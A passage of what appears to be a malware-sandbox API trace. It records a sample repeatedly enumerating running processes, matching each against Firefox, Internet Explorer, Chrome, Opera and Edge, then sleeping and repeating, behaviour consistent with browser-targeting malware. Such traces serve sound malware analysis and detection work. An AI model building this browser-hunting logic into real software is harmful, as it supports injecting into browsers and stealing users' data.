lpString2="iexplore.exe") returned 1 [0183.251] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0183.251] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0183.251] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.251] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0183.252] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0183.252] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0183.252] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0183.252] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0183.252] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.252] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0183.252] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0183.252] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0183.252] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0183.252] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0183.253] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.253] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0183.253] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0183.253] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0183.253] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0183.253] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0183.253] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.253] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0183.254] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0183.254] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0183.254] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0183.254] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0183.254] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.254] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0183.254] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0183.254] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0183.254] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0183.254] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0183.254] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.254] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0183.255] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0183.255] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0183.255] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0183.255] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0183.255] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.255] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0183.255] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0183.255] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0183.255] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0183.255] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0183.255] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.255] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0183.256] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0183.256] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0183.256] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0183.256] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0183.256] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.256] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0183.256] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0183.257] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0183.257] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0183.257] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0183.257] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.257] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0183.257] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0183.257] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0183.257] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0183.257] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0183.257] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.257] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0183.258] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0183.258] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0183.258] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0183.258] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0183.258] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.258] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0183.258] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0183.258] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0183.258] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0183.258] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0183.258] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.258] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0183.259] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0183.259] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0183.259] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0183.259] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0183.259] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.259] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.259] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0183.259] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0183.259] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0183.259] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0183.260] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.260] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.260] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.260] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.260] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.260] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.260] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.260] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0183.261] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0183.261] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0183.261] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0183.261] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0183.261] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.261] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.261] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.261] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.261] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.261] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.261] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.261] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0183.262] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0183.262] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0183.262] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0183.262] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0183.262] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.262] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.262] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.263] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.263] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.263] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.263] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.263] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.263] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.263] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.263] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.263] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0183.263] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.263] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0183.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0183.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0183.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0183.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0183.264] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.264] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0183.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0183.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0183.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0183.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0183.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.264] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.265] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.265] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.265] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.265] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0183.265] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.265] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.265] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.265] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.266] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.266] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0183.266] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.266] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.266] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.266] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.266] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0183.266] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0183.267] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0183.267] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0183.267] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0183.267] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0183.267] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.267] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0183.267] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0183.267] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0183.267] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0183.267] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0183.267] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0183.267] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0183.268] CloseHandle (hObject=0xe8) returned 1 [0183.268] Sleep (dwMilliseconds=0x3e8) [0184.276] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0184.277] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.278] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0184.278] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0184.278] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0184.278] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0184.278] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0184.278] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.279] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0184.279] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0184.279] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0184.279] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0184.279] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0184.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.279] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0184.279] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0184.279] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0184.279] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0184.279] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.279] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.280] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0184.280] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0184.280] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0184.280] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0184.280] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.280] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.280] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0184.280] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0184.280] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0184.280] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0184.280] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.280] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.281] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0184.281] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0184.281] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0184.281] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0184.281] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0184.281] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.282] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0184.282] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0184.282] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0184.282] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0184.282] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.282] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.282] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0184.282] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0184.282] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0184.282] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0184.282] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0184.282] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.283] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0184.283] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0184.283] lstrcmpiA (lpString1="lsass.exe", 